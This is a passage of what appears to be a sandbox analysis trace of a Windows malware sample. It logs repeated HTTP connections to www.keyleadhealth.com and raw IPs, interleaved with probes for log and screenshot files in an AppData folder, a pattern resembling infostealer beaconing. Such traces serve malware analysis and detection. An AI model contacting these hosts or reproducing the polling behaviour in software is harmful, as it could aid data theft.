sin_port=0x50, sin_addr="35.213.185.140"), namelen=16) returned 0 [0206.465] send (s=0x614, buf=0x25a505a*, len=174, flags=0) returned 174 [0206.466] setsockopt (s=0x614, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0206.466] recv (in: s=0x614, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 549 [0206.730] closesocket (s=0x614) returned 0 [0206.730] Sleep (dwMilliseconds=0x7d0) [0206.735] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.735] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.735] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0206.735] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.735] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.735] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.735] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.735] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.735] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.735] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.735] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.736] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.736] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.736] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.736] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.736] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.736] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.736] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.736] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.736] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.736] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.736] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.736] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.736] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.736] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.736] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.736] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.736] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.736] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.736] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.737] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.737] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.737] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.737] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.737] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.737] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.737] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.737] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.737] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.737] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.737] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.737] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.737] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0206.737] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.737] socket (af=2, type=1, protocol=6) returned 0x614 [0206.738] getaddrinfo (in: pNodeName="www.keyleadhealth.com", pServiceName="80", pHints=0x6f0d118*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0d148 | out: ppResult=0x6f0d148*=0x3eb4bd0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x70aca30*(sa_family=2, sin_port=0x50, sin_addr="35.242.251.130"), ai_next=0x0)) returned 0 [0206.860] connect (s=0x614, name=0x70aca30*(sa_family=2, sin_port=0x50, sin_addr="35.242.251.130"), namelen=16) returned 0 [0206.881] send (s=0x614, buf=0x25a505a*, len=173, flags=0) returned 173 [0206.881] setsockopt (s=0x614, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0206.882] recv (in: s=0x614, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 998 [0206.971] closesocket (s=0x614) returned 0 [0206.971] Sleep (dwMilliseconds=0x7d0) [0206.984] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.984] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.984] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0206.984] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.984] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.984] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.985] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.985] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.985] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.985] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.985] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.985] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.985] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.985] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.985] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.985] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.985] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.985] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.985] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.985] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.985] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.985] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.985] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.985] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.985] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.985] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.985] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.985] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.985] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.986] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.986] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.986] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.986] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.986] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.986] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.986] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.986] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.986] NtCreateFile (in: FileHandle=0x26ef630, 